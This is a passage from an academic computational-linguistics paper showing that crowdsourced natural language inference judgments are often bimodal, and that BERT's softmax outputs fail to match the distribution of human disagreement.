this hands-off approach to NLI, avoiding definitions of what inferences humans should make or which types of knowledge they should invoke. We take the position that, ultimately, our 1We, too, adopt the word ‘‘inference’’ for this reason. 678 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 goal in NLP is to train models that reverse- engineer the inferences a human would make when hearing or reading language in the course of their daily lives, however ad-hoc the process that generates those inferences might be. Therefore, our question in this paper is not yet what process humans use to draw inferences from natural lan- guage, but merely: Left to their own devices, do humans, in general, tend to follow the same process? Note that this question is independent of the decision of whether to treat annotations as discrete versus gradable. Even if NLI is treated as a gradable phenomenon (as we believe it should be), a world in which all humans share the same notion of uncertainty necessitates very different models, annotation practices, and modes of evaluation than a world in which people may disagree substan- tially in specific situations, use different heuristics, and/or have different preferences about how to resolve uncertainty. Specifically, current practices— in which we aggregate human judgments through majority vote/averaging and evaluate models on their ability to predict this aggregated label—are only appropriate if humans all tend to use the same process for resolving uncertainties in practice. 3 NLI Data and Annotation To perform our analysis, we collect NLI judg- ments at 50× redundancy for sentence pairs drawn from a variety of existing NLI datasets. Our anno- tation procedure is described in detail in this section. All of the data and collected anno- tations are available at https://github. com/epavlick/NLI-variation-data. 3.1 Sentence Pairs We draw our p/h pairs from the training sets of each of the following five datasets: RTE2 (Dagan et al., 2006), SNLI (Bowman et al., 2015), MNLI (Williams et al., 2018), JOCI (Zhang et al., 2017), and DNC (Poliak et al., 2018b). Table 1 shows randomly sampled positive (p → h) and negative (p �→ h) examples from each. These datasets differ substantially in the procedures used to generate the data, and in the types of inferences they attempt to test. RTE2 consists of premises/hypothesis pairs derived predominantly from the output of information retrieval systems run over newswire text and annotated by experts (researchers in the field). SNLI consists of premises derived from image captions with hypotheses written and judged by non-expert (crowdsourced) annotators. MNLI was constructed in the same way as SNLI but contains premises drawn from a range of text genres, including letters, fiction, and telephone conversations. JOCI is intended to target ‘‘com- mon sense’’ inferences, and contains premises drawn from existing NLI datasets2 paired with hypothesis that were automatically generated via either templates or seq2seq models and then refined by humans. The DNC consists predomi- nantly of naturally occurring premises paired with template-generated hypotheses, and comprises a number of sub-corpora aimed at testing systems’ understanding of specific linguistic phenomena (e.g., lexical semantics, factuality, named entity recognition). We draw from this variety of data- sets in order to ensure a diversity of types of tex- tual inference and to mitigate the risk that the disagreements we observe are driven by a specific linguistic phenomenon or dataset artifact on which humans’ interpretations particularly differ. We sample 100 p/h pairs from each dataset. In every dataset, we limit to pairs in which the premise and the hypothesis are both less than or equal to 20 words, to minimize cognitive load during annotation. We attempt to stratify across expected labels to ensure an interesting balance of inference types. For RTE2, SNLI, and MNLI, this means stratifying across three categories (ENTAILMENT/CONTRADICTION/NEUTRAL). For JOCI, the p/h pairs are labeled on a five-point Likert scale, where 1 denotes that h is ‘‘impossible’’ given p and 5 denotes that h is ‘‘very likely’’ given p, and thus we stratify across these five classes. In the DNC, all sub-corpora consist of binary labels (ENTAILMENT/NON-ENTAILMENT) but some sub- corpora contain finer-grained labels than others (e.g., three-way or five-way labels). Thus, when sampling, we first stratify across sub-corpora3 and then across the most fine-grained label type available for the given sub-corpus. 3.2 Annotation We show each p/h pair to 50 independent raters on Amazon Mechanical Turk. We ask them to 2We skip the subset of JOCI that was drawn from SNLI, to avoid redundancy with our own SNLI sample. 3We skip two sub-corpora (VerbCorner and Puns), the former because it contains nonced words and thus is difficult to ask humans to label without some training, and the latter because of the potential for noisy labels due to the fact that some people, bless their hearts, just don’t appreciate puns. 679 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://github.com/epavlick/NLI-variation-data https://github.com/epavlick/NLI-variation-data SNLI Three dogs on a sidewalk. → There are more than one dog here. A red rally car taking a slippery turn in a race. → ¬ The car is stopped at a traffic light. MNLI Historical heritage is very much the theme at Ichidani. → Ichidani’s historical heritage is important. okay i uh i have five children all together → ¬ I do not have any children. RTE2 Self-sufficiency has been turned into a formal public awareness campaign in San Francisco, by Mayor Gavin Newsom. → Gavin Newsom is a politician of San Francisco. The unconfirmed case concerns a rabies-like virus known only in bats → ¬ A case of rabies was confirmed. JOCI It was Charlie ’s first day of work at the new firm → The firm is a business. A young girl is holding her teddy bear while riding a pony . → ¬ The bear attacks. DNC Tony bent the rod. → Tony caused the bending. When asked about the restaurant, Jonah said, ‘Sauce was tasteless.’ �→ Jonah liked the restaurant. Table 1: Examples of p/h pairs from each of our source datasets. The top pair is one labeled by the original dataset as a valid inference (one that should be drawn), the bottom as an invalid inference (either h is contradictory given p (p → ¬h), or h simply cannot be inferred (p �→ h)). For DNC, examples shown are from the VerbNet (top) and Sentiment (bottom) sub corpora. indicate using a sliding bar, which ranges from −50 to 50,4 how likely it is that h is true given that p is true, where −50 means that h is definitely not true (p → ¬h), 50 means that h is definitely true (p → h), and 0 means that h is consistent with but not necessarily true given p (p �→ h). Raters also have the option to indicate with a checkbox that either/both of the sentences do not make sense and thus no judgment can be made. We attempt to pitch the task intuitively and keep the instructions light, for reasons discussed in Section 2. We provide brief instructions followed by a few examples to situate the task. Our exact instructions and examples are shown Table 2. Raters label pairs in batches of 20, meaning we have a minimum of 20 ratings per rater. We pay $0.30 per set of 20. We restrict to raters who have a 98% or better approval rating with at least 100 HITs approved, and who are located in a country in which English is the native language (US, Canada, UK, Australia, New Zealand). 3.3 Preprocessing Filtering. In total, we had 509 workers complete our HITs, with an average of 2.5 tasks (50 sentence pairs) per worker. We follow the methods from White et al. (2018) and remove workers who demonstrate consistently low correlations with others’ judgments. Specifically, for each sentence pair s, for each worker wi, we compute the Spearman correlation between wi’s labels and 4Raters do not see specific numbers on the slider. For each pair of sentences, assume that the first sentence (S1) is true, describes a real scenario, or expresses an opinion. Using your best judgment, indicate how likely it is that the second sentence (S2) is also true, describes the same scenario, or expresses the same opinion. If either sentence is not interpretable, check the ‘‘Does Not Make Sense’’ box. Several examples are given below. Example 1: In the below example, the slider is far to the right because we can be very confident that if a person is ‘‘on a beach’’ than that person is ‘‘outside’’. S1: A woman is on a beach with her feet in the water. S2: The woman is outside. Example 2: In the below example, the slider is far to the left because we can be very confident that if a person is ‘‘on a beach’’ then that person is NOT ‘‘in her living room’’. S1: A woman is on a beach with her feet in the water. S2: The woman is in her living room. Example 3: In the below example, the slider is in the center because knowing that woman is on the beach does not give us any information about the color of her hair and so we cannot reasonably make a judgment about whether or not her hair is brown. S1: A woman is on a beach with her feet in the water. S2: The woman has brown hair. Table 2: Instructions and examples shown to raters. Raters indicated their responses using a sliding bar which ranged from −50 to 50. In the instructions actually shown, the examples were shown alongside a sliding bar reflecting the desired rating. Exact UI not shown for compactness. every other wj who labeled s. Across all pairs of workers, the mean correlation is 0.48. We consider a pair of workers on a given assignment to be an outlier if the correlation between those workers’ ratings falls outside 1.5 times the interquartile 680 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 range of all the correlations (White et al., 2018). We find 234 pairs to be outliers, and that they can be attributed to 14 individual workers. We therefore remove all annotations from these 14 workers from our analysis. Additionally, we remove ratings from 37 workers5 who have fewer than 15 useable data points (i.e., judgments not including cases in which they choose the ‘‘does not make sense’’ option), as this will prevent us from properly estimating and thus correcting for their individual annotation bias (described in the following section). Finally, we remove p/h pairs that, after removing all problematic workers and ‘‘does not make sense’’ judgments, are left with fewer than 15 judgments. In the end, we have 496 p/h pairs with a mean of 39 labels per pair. Normalization. One confound that results from collecting annotations on a continuous scale is that each rater may choose to use the scale differently. Thus, we apply z-score normalization to each worker’s labels for each assignment, meaning each worker’s ratings are rescaled such that the mean across all labels from a single worker within a single batch is 0 and the standard deviation is 1. This normalization is not perfect, as every batch has a slightly different set of pairs, and so normalized scores are not comparable across batches. For example, if, by chance, a batch were to contain mostly pairs for which the ‘‘true’’ label was p → h, a score of zero would imply p → h, whereas if a batch were to include mostly pairs for with the ‘‘true’’ label was p → ¬h, zero would correspond to p → ¬h. However, for the purposes of our analysis, this is not problematic; because our interest is comparing disagreements between annotations on each specific p/h pair, it is only important that two worker’s labels on the same pair are comparable, not that judgments across pairs are comparable.6 5Results presented throughout are based on data with these workers removed. However, rerunning analysis with these workers included did not affect our overall takeaways. 6On our own manual inspection, it is nearly always the case that the mean (0) is roughly interpretable as neutral, with only moderate deviations from one example to the next. Nonetheless, when interpreting the figures in the following sections, note that the center of one pair’s distribution is not necessarily comparable to the center of another’s. 4 Analysis of Human Judgments 4.1 Experimental Design We aim to establish whether the disagreements observed between humans’ NLI judgments can be attributed to ‘‘noise’’ in the annotation process. We make the assumption that, if the disagreements are attributable to noise, then the observed human judgments can be modeled as a simple Gaussian distribution, where the mean is the true label. This model can account for the fact that some cases might be inherently harder than others—this could, for example, be reflected by higher variance— but, overall, the labels are nonetheless in ac- cordance with the assumption that there exists a fundamentally ‘‘true’’ label for each p/h pair which we can faithfully represent via a single label or value, obtainable via aggregation. For each sentence pair, we randomly split the collected human labels into train and test. Specifically, we hold out 10 labels from each pair to use as our test set. The training data are composed of the remaining labels, which varies in number from 5 to 40, depending on how many labels were left for that pair after preprocessing (see Section 3.3). The average number of training labels is 29. For each sentence pair, we use the training data to fit two models: 1) a single Gaussian and 2) a Gaussian Mixture Model where the number of components is chosen during training,7 meaning that the model may still choose to fit only one component if appropriate. We compute the log likelihood assigned to the held-out test data under each model, and observe how often, and to what extent, the additional components permitted by the GMM yield a better fit for the held out judgments. If the mixture model frequently choses to use more than one effective component, and if doing so results in a better fit for the held-out data than the unimodal Gaussian, we interpret this as evidence that, for many sentence pairs, human judgments exhibit reproducibly multimodal distributions. Thus, for such sentence pairs, the current practice of aggregating human judgments into a single label would fail to accurately capture the types 7We use the Variational Bayesian estimation of a Gaussian mixture provided in SciKit learn, with the maximum number of components set to be the number of points in the training data: https://scikit-learn.org/stable/modules/ generated/sklearn.mixture.BayesianGaussian Mixture.html 681 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://scikit-learn.org/stable/modules/generated/sklearn.mixture.BayesianGaussianMixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.BayesianGaussianMixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.BayesianGaussianMixture.html Figure 2: Log likelihood assigned to test data under the single-component Gaussian (x-axis) vs the k- component GMM (y-axis). Results show an average over 10 random train/test splits; error bars not shown to reduce clutter. Overall, multimodal distributions generalize better to unseen human judgments than do single Gaussians. of semantic inferences that humans might make about the given p/h pair. 4.2 Results Are distributions unimodal? Figure 2 shows, for each sentence pair, the test log likelihood under the one-component Gaussian model versus the k-component GMM. If the data were in fact sampled from an underlying distribution defined by a single Gaussian, we would expect the points to be distributed approximately randomly around the y = x line. That is, most of the time the GMM would provide no advantage over the sin- gle Gaussian. What we see instead is that the majority of points fall on or above the y = x line, indicating that, when there is a difference, the additional components deemed necessary in training tend to generalize to unseen human judgments. Very few points fall below the y = x line, indicating that when models choose to fit multiple components, they are correctly modeling the true data distribution, rather than overfitting the training set. We note that the majority of points fall on y = x, indicating that most examples do exhibit consensus around one ‘‘true’’ label.8 Figure 3 shows, for each sentence pair, the weights of the effective components according the the 8We verified that, if forced to fit more than one com- ponent, the model often overfits, confirming that these examples are indeed best modeled as unimodal distributions. Figure 3: Weights of effective components for each p/h pair. y-axis corresponds to the pairs in our data, sorted by weight of the second component. The figure should be interpreted as follows: When the line is all blue (pair #400), the GMM found a single component with a weight of 1. When the line contains mixed col- ors, the model found multiple components with the depicted weights (e.g., pair #0 has two components of equal weight). GMM. We see that for 20% of the sentence pairs, there is a nontrivial second component (weight > 0.2), but rarely are there more than two components with significant weights. Figure 4 shows several examples of sentences for which the annotations exhibit clear bimodal distributions. These examples show the range of linguistic phenomena9 that can give rise to un- certainty. In the first example, from SNLI, there appears to be disagreement about the degree to which two different descriptions could potentially refer to the same scenario. In the second example, from DNC and derived from VerbNet (Chklovski and Pantel, 2004), there is disagreement about the manner aspect of ‘‘swat’’, that is, whether or not ‘‘swatting’’ is necessarily ‘‘forceful’’. In the third example, from DNC and derived from the MegaVerdicality dataset (White and Rawlins, 2017), there appears to be disagreement about the degree to which ‘‘confess that’’ should be treated as factive. These examples highlight legitimate disagree- ments in semantic interpretations, which can be difficult to control without taking a highly pre- scriptivist approach to annotation. Doing so, 9By corpus, RTE exhibits the least variation and JOCI exhibits the most, though all of the corpora are comparable. We did not see particularly interesting trends when we broke down the analysis by corpus explicitly, so, for brevity, we omit the finer-grained analysis. 682 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 Figure 4: Examples of sentence pairs with bi-modal human judgment distributions. Examples are drawn from SNLI, the VerbNet portion of DNC, and the MegaVerdicality portion of DNC (from left to right). Training distribution is in blue; test in orange. Dotted black line shows the model fit when using a single component; shaded gray shows the model learned when allowed to fit k components. Distributions are over z-normalized scores in which 0 roughly corresponds to neutral (p �→ h) but not precisely (§3.3). however, would compromise both the ‘‘natural- ness’’ of the task for annotators and the empiricist approach to representation learning currently de- sired in NLP (as discussed in Section 2). Does context reduce disagreement? One fair objection to these results is that sentence-level inferences are problematic due to the lack of context provided. It is reasonable to believe that the divergences in judgments stem from the fact that, when details of the context are left unspecified, different raters choose to fill in these details differently. This would inevitably lead to different inferences, but would not be reflective of differences in humans’ representations of lin- guistic ‘‘meaning’’ as it pertains to NLI. We thus explore whether providing additional context will yield less-divergent human judgments. To do this, we construct a small dataset in which we can collect annotations with varying levels of context, as described next. Method. We sample sentences from Wikipedia, restricting to sentences that are at least four words long and contain a subject and a verb. We consider each of these sentences to be a candidate premise (p), and generate a corresponding hypothesis (h) by replacing a word w1 from p with a substitute w2, where w2 has a known lexical semantic re- lationship to w1. Specifically, we use as set of 300 word pairs: 100 hypernym/hyponym pairs, 100 antonym pairs, and 100 co-hyponym pairs. We chose these categories in order to ensure that our analysis consists of meaningful substitutions and that it covers a variety of types of inference judgments. Our hypernyms and antonyms are taken from WordNet (Fellbaum, 1998), with hy- pernyms limited to first-sense immediate hyper- nyms. Our co-hyponyms are taken from an internal database, which we constructed by running Hearst patterns (Hearst, 1992) over a large text corpus. The 300 word pairs we used are available for inspection at https://github.com/epavlick/NLI- variation-data. After making the substitution, we score each candidate p and h with a language model (Józefowicz et al., 2016) and disregard pairs for which the perplexity of h is more than 5 points above that of p. This threshold was chosen based on manual inspection of a sample of the output, and is effective at removing sentences in which the substitution yielded a meaningless hypothesis—for example, by replacing a w1 that was part of a multiword expression. For each resulting p/h pair, we collect ratings at three levels: word level, in which p and h are each a single word; sentence level, in which p and h are each a sentence; and paragraph level, in which p is a full paragraph and h is a sentence (as depicted in Figure 6). We use the same anno- tation design as described in Section 3.2. To quantify the level of disagreement in the observed judgments, we compute two measures: 1) variance of observed ratings and 2) Δ log likelihood, that is, the change in log likelihood of held out data that results from using a k-component GMM over a single-component Gaussian (as described in the previous section). We note that Δ log likelihood is a more direct measure of the type of disagreement in which we are interested in this paper (i.e., disagreements stemming from multimodal distributions of judgments that are 683 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://github.com/epavlick/NLI-variation-data https://github.com/epavlick/NLI-variation-data Figure 5: Distributions of variances (top) and Δ log likelihood (bottom) for human ratings resulting from word, sentence, and paragraph contexts. The average variances of all levels are significantly different at p < 0.05 (word < sentence < paragraph). Average ΔLL for words was significantly lower than for sentences and paragraphs, but there is no significant difference between sentences and paragraphs. not well summarized by a single label/value). High variance distributions may correspond to ‘‘difficult’’ cases which are nonetheless still unimodal. Results. Figure 5 shows the distribution of each metric as a function of the level of context given to raters. The trend is counter to our initial intuition: Both measures of disagreement actually increase when raters see more context. On aver- age, we see a variance of 0.34 ± 0.02 when raters are shown only words, 0.41 ± 0.02 when raters are shown sentences, and 0.56 ± 0.02 when rat- ers are given a full paragraph of context (95% con- fidence intervals). The trend for Δ log likelihood is similar: Disagreement at the word level (0.11 ± 0.02) is significantly lower than at the sentence (0.21 ± 0.04) and paragraph (0.22 ± 0.03) level, though there is no significant difference in Δ log likelihood between sentence-level and paragraph-level. Figure 6 shows an example p/h pair for which additional context increased the variance among annotators. In the example shown, humans are generally in agreement that ‘‘boating’’ may or may not imply ‘‘picknicking’’, when no additional context is given. However, when information is provided which focuses on boating on a specific canal, emphasizing the activities that the water itself is used for, people diverge in their inference judgments, with one group centered around contradiction and a smaller group centered around neutral. We interpret these results as preliminary evi- dence that disagreement is not necessarily control- lable by providing additional context surrounding the annotation (i.e., we do not see evidence that increasing context helps, and it may in fact hurt). We hypothesize that, in fact, less context may result in higher agreement due to the fact that humans can more readily call on conventional- ized ‘‘default’’ interpretations. For example, in the case of single words, people likely default 684 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 Figure 6: In the word case, human judges were shown only the words (bolded); in the sentence case, judges were shown pairs of sentences (gray highlight); in the paragraph case, judges were shown all of the text. Judges did not see markup (bold/highlight) when presented the text to judge. Gray bars show distribution of z-normalized scores, ticks show raw (unnormalized) scores, bell curves are estimated by the GMM. to reading them as referring expressions for a single entity/event, and thus make judgments con- sistent with the prototypical lexical entailment relations between these words. Additional con- text provides increased opportunity for inferences based on pragmatics and world knowledge (e.g., inferences about the question under discussion and the speaker’s intent), which are less likely to follow consistent conventions across all raters. We consider this study exploratory, as there are some confounds. Most notably, increasing the amount of context clearly increases cognitive load on annotators, and thus we would expect to see increased variance even if there were no increase in actual interpretive disagreements. However, the increase in the Δ log likelihood metric is more meaningful, because randomly distributed noise (which we might expect in the case of high cog- nitive load/low annotator attention) should lead to higher variance but not multimodality. More work is needed to explore this trend further, and to determine whether increasing context would be a viable and productive means for reducing disagreements on this task. 5 Analysis of Model Predictions 5.1 Motivation Another natural question arising from the analysis presented thus far is whether the phenomenon under investigation even poses a problem for NLP systems at all. That is, whether or not hu- mans’ judgments can be summarized by a single aggregate label or value might be a moot question, since state-of-the-art models do not, in practice, predict a single value but rather a distribution over values. It may be the case that these predicted distributions already reflect the distributions observed in the human judgments and thus that the models can be viewed as already adequately capturing the aspects of semantic uncertainty that cause the observed human disagreements. We thus measure the extent to which the softmax distributions produced by a state-of-the-art NLI model trained on the dataset from which the p/h pairs were drawn reflects the same distribution as our observed human judgments. 5.2 Experimental Design Data. NLI is standardly treated as a classi- fication task. Thus, in order to interface with existing NLI models, we discretize10 our collected human judgments by mapping the raw (un- normalized) score (which is between −50 and 50) into K evenly sized bins, where K is equal to the number of classes that were used in the original dataset from which the p/h pair was drawn. Specifically, for pairs drawn from datasets which use the three-way ENTAILMENT/ CONTRADICTION/NEUTRAL labels (i.e., SNLI, MNLI, and RTE2), we consider human scores less than −16.7 to be CONTRADICTION, those greater than 16.7 to be ENTAILMENT, and those in between to be NEUTRAL. For the binary tasks (DNC), we use the same three-way thresholds, but consider scores below 16.7 to be NONENTAILMENT and those above to be ENTAILMENT. After some experimentation, we ultimately choose to map the 10We experimented with multiple variations on this mapping, including using the z-normalized (rather than the raw) human scores, and using bins based on percentiles rather than evenly spaced over the full range. None of these variants noticeably affected the results of our analysis or the conclusions presented in the following section. 685 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 Orig./ BERT/ BERT/ Ours Orig Ours ∩ SNLI 0.790 0.890 0.830 76 MNLI 0.707 0.818 0.687 62 RTE2 0.690 0.460 0.470 36 DNC 0.780 0.900 0.800 74 JOCI 0.651 0.698 0.581 41 Table 3: Left to right: Agreement between datasets’ original labels and the majority label according to our (discretized) re-annotation; accuracy of BERT NLI model against original labels; accuracy of BERT against re-annotation labels; number of p/h pairs (out of 100) on which all three label sources (original, re-annotation, model prediction) agree on the most likely label. Our analysis in §5.3 is performed only over pairs in ∩. JOCI scores to a three-way classification scheme as well, rather than the original five-way scheme, using 1 = CONTRADICTION, {2,3,4} = NEUTRAL, and 5 = ENTAILMENT. This decision was made after observing that, although our overall results and conclusions remained the same regardless of the way we performed the mapping, the three-way mapping led to higher levels of agreement between the original labels and our newly collected labels, and thus gave the model the best chance of learning the distribution against which it will be tested.11 Agreement between the original labels (i.e., those in the published version of the data) and our discretized newly collected labels are given in the first column of Table 3. We note that measuring agreement and model accuracy in terms of these discrete distributions is not ideal, and it would be preferable to train the model to directly predict the full distributions, but because we do not have sufficient training data to do this (we only collected full distributions for 100 p/h pairs per dataset) we must work in terms of the discrete labels provided by the existing training datasets. Model. We use pretrained BERT (Devlin et al., 2019),12 fine-tuned on the training splits of the datasets from which our test data was drawn. That is, we fine-tune BERT five times, once on each dataset, and then test each model on the subset of our re-annotated p/h pairs that were drawn from 11We also try removing JOCI from our analysis entirely, since it is the noisiest dataset, and still reach the same conclusions from our subsequent analysis. 12https://github.com/google-research/bert the dataset on which it was fine-tuned. We remove from each training set the 100 p/h pairs that we had re-annotated (i.e., the data we use for testing). We use the BERT NLI model off-the-shelf, without any changes to architecture, hyperparameters, or training setup. Table 3 shows the accuracy of each model on the test set (i.e., our 100 re-annotated sentences) when judged against 1) the original (discrete) label for that pair given in the standard version of the dataset (i.e., the same type of label on which the model was trained) and 2) our new (discretized) label derived from our re-annotation. Table 3 also gives the agreement between the original discrete labels and the discretized re-annotation labels. Metrics. We want to quantify how well the model’s predicted softmax distribution captures the distribution over possible labels we see when we solicit judgments from a large sample of annotators. To do this, we consider the model softmax to be a basic multinomial distribution, and compute 1) the probability of the observed human labels under that multinomial and 2) the cross- entropy between the softmax and the observed human distributions. As a point of comparison, we compute the same metrics for a random sample, of equal size to the set of observed labels, drawn from the multinomial defined by the softmax. We focus only on p/h pairs on which all three label sources (i.e., the original label provided by the official dataset, the new label we produce by taking the majority vote of our newly collected, discretized human judgments, and the model’s prediction) agree. That is, because we want to evaluate whether the model captures the distrib- ution (not just the majority class that it was trained to predict) we want to focus only on cases where it at least gets the majority class right. Because we want to compare against the full distribution of discretized human labels we collected, we don’t want to consider cases where the majority class according to this distribution disagrees with the majority class according to the model’s training data, since this would unfairly penalize the model. Table 3 shows the number of pairs (out of 100) on which these three label sources agree, for each dataset. 5.3 Results Overall, the softmax is a poor approximation of the distribution observed across the human 686 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://github.com/google-research/bert Cross Ent. Log Prob. Exp. 0.03 (0.03, 0.03) −1.6 (−1.7, −1.5) Obs. 0.37 (0.33, 0.42) −21.5 (−22.6, −20.1) Table 4: Softmax is not a good estimate of the distribution of human labels. Exp. refers to the sim- ilarity values we expect due to random variation (i.e., what we get when we compute against a ran- dom sample drawn from the multinomial defined by the softmax). Obs. refers to the similarity values between the softmax distribution and the human distribution. Numbers in parentheses give 95% confidence intervals. Results are effectively the same for each of individual corpora, so we report only the aggregate results. judges. The log probability assigned to the ob- servations (i.e., the set of human labels) by the predicted (softmax) multinomial is significantly and substantially lower than the probability that we would expect to be assigned if the observations had been in fact sampled from the predicted distribution. Similarly, the cross entropy between the predicted and the observed distribution is significantly higher than what can be attributed to random noise (Table 4). Figure 7 shows some examples of p/h pairs for which the softmax substantially misrepresents the nature of the uncertainty that exists among the human labels, in one case because the model predicts with certainty when humans find the judgment ambiguous (due to the need to resolve an ambiguous co-reference) and in the other because the model suggests ambiguity when humans are in clear consensus. Overall, the results indicate that while softmax allows the model to represent uncertainty in the NLI task, this uncertainty does not necessarily mimic the uncertainty that exists among humans’ perceptions about which inferences can and cannot be made. It is worth noting that the softmax distributions tend to reflect the model’s confidence on the dataset as a whole, rather than uncertainty on individual examples. For example, in the RTE2 dataset, the model nearly always splits probability mass over multiple labels, whereas in SNLI, the model typically concentrates probability mass onto a single label. This is not surprising behavior, but serves to corroborate the claim that modeling probabilistic entailment via softmax layers does Figure 7: Examples of p/h pairs on which the model’s predictions about the distribution (blue) misrepresent the nature of the uncertainty observed among human judgments (orange). In the first example (from RTE2) the model assumes ambiguity when humans consider the inference to be unambiguous (Cross-Ent = 0.36; PMF = 2.2e-6). In the second example (from SNLI) the model is certain when humans are actually in disagreement (Cross-Ent = 0.43; PMF = 5.9e-18) not correspond to modeling annotator uncertainty about inference judgments on specific items. 6 Discussion The results in Sections 4 and 5 suggest that 1) human NLI judgments are not adequately captured by a single aggregate score and 2) NLI systems trained to predict an aggregate score do not learn human-like models of uncertainty ‘‘for free’’. These takeaways are significant for work in computational semantics and language technology in general primarily because NLI has, historically (Cooper et al., 1996; Dagan et al., 2006) as well as presently (White et al., 2017), been proposed as a means for evaluating a model’s ‘‘intrinsic’’ understanding of language: As originally framed by Dagan et al. (2006), NLI was proposed as an intermediate task for evaluating whether a model will be useful in applications, and currently, NLI is increasingly used as a means for ‘‘probing’’ neural models to assess their knowledge of arbitrary linguistic phenomena (Dasgupta et al., 2018; Ettinger et al., 2018; Poliak et al., 2018b; White et al., 2017; Poliak et al., 2018a; McCoy et al., 2019). In other words, NLI has largely become an evalu- ation lingua franca through which we diagnose what a semantic representation knows. With the increased interest in ‘‘general-purpose’’, ‘‘task 687 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 independent’’ semantic representations,13,14 it is particularly important that intrinsic evaluations are reliable, if comparison of such representations are to be meaningful. As discussed, the preference among many in NLP (the authors included) is to avoid tasks which take a prescriptivist approach to language and meaning. Instead, we attempt to design tasks which capture humans’ linguistic behavior in as natural a setting as possible (acknowledging that truly natural annotation is difficult) with the hope that models trained to perform such tasks will be the best match for the ‘‘real world’’ settings in which we hope to deploy them. That is, we generally prefer to punt on precise definitions, and instead train our models to ‘‘do what humans do’’. In this paper, we have shown that defining ‘‘what humans do’’ is not straightforward, as humans do not necessarily handle ambiguity or communi- cate uncertainty in the same way as one another. Thus, as was the case for pipelined systems (Zadrozny and Elkan, 2002; Finkel et al., 2006; Bunescu, 2008) and related discussions of model calibration (Kuleshov and Liang, 2015), we argue that the best approach is to propagate uncertainty downstream, so that end tasks can decide if and how to handle inferences on which humans are likely to disagree. From the point of view of current neural NLI models—and the sentence encoders on top of which they are built—this means that a representation should be evaluated in terms of its ability to predict the full distribution of human inferences (e.g., by reporting cross- entropy against a distribution of human ratings), rather than to predict a single aggregate score (e.g., by reporting accuracy against a discrete ma- jority label or correlation with a mean score). We have shown that models that are trained to predict an aggregate score do not, by default, model the same type of uncertainty as that which is captured by distributions over many human raters’ judgments. Thus, several challenges would need to be overcome to switch to the proposed NLI evaluation. First, NLI evaluation sets would need to be annotated by sufficiently many raters such that we can have an accurate estimate of the distribution against which to evaluate. Although the data collected for the purposes of this paper 13https://www.clsp.jhu.edu/workshops/18- workshop/general-purpose-sentence- representation-learning/ 14https://repeval2019.github.io could serve as a start towards this end, a larger effort to augment or replace existing evaluation sets with full distributions of judgments would be necessary in order to yield a meaningful redefinition of the NLI task. Second, changes would be required to enable models to learn to predict these distributions. One approach could be to annotate training data, not just evaluation data, with full distributions, and optimize for the objective directly. This would clearly incur additional costs, but could be overcome with more creative crowdsourcing techniques (Dumitrache et al., 2013; Poesio et al., 2019). However, re- quiring direct supervision of full distributions is arguably an unsatisfying solution: Rarely if ever do humans witness multiple people responding to identical stimuli. Rather, more plausibly, we form generalizations about the linguistic phenomena that give rise to uncertainty on the basis of a large number of singly labeled examples. Thus, ideally, progress can be made by developing new architectures and/or training objectives that enable models to learn a notion of uncertainty that is consistent with the full range of possible human inferences, despite observing labels from only one or a few people on any given p/h pair. Overcoming these challenges, and moving towards models which can both understand sources of linguistic uncertainty and anticipate the range of ways that people might resolve it would be exciting both for NLI and for representation learning in general. 7 Related Work Defining Entailment and NLI. As outlined in Section 2, there has been substantive discussion about the definition of the NLI task. This debate can largely be reduced to a debate about sentence meaning versus speaker meaning. The former aligns more closely with the goals of formal semantics and seeks a definition of the NLI task that precisely circumscribes the ways in which vague notions of ‘‘world knowledge’’ and ‘‘com- mon sense’’ can factor into inference (Zaenen et al., 2005). The latter takes the perspective that the NLI task should maintain an informal defi- nition in which p → h as long as h is some- thing that a human would be ‘‘happy to infer’’ from p, where the humans making the inferences are assumed to be ‘‘awake, careful, moderately intelligent and informed . . . but not . . . seman- ticists or similar academics’’ (Manning, 2006). 688 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://www.clsp.jhu.edu/workshops/18-workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/18-workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/18-workshop/general-purpose-sentence-representation-learning/ https://repeval2019.github.io Garoufi (2007) provides an overview of attempts that have been made to circumscribe the annota- tion process by providing finer-grained annota- tion options, in order to bring it more in line with the sentence-meaning task definition. Westera and Boleda (2019), in the context of advocating for distributional models of semantics in general, makes a case in favor of the speaker-meaning ap- proach, arguing that issues like entailment, refer- ence, and truth conditions should not fall within the purview of sentence meaning at all, despite being quintessential topics of formal semantic study. Chatzikyriakidis et al. (2017) overview NLI datasets, observing that datasets tend to be designed with one of these perspectives in mind, and thus all datasets ‘‘fail to capture the wealth of inferential mechanisms present in NLI and seem to be driven by the dominant discourse in the field at the time of their creation.’’ An orthogonal line of discussion about the definition of entailment focuses on the question of whether truth-conditional semantics should be strictly binary (propositions are either true or false) or rather treated as continuous/probabilistic val- ues. Currently, at least within computationally minded work on textual inference, the prevailing opinion is in favor of the latter (i.e., allowing semantic judgments to be probabilistic) with few (if any) advocating that we should build systems that only support discrete true/false decisions. Still, significant theoretical and algorithmic work has gone into making probabilistic logics work in practice. Such work includes (controversial) for- malisms such as fuzzy set theory (Zadeh, 1994, 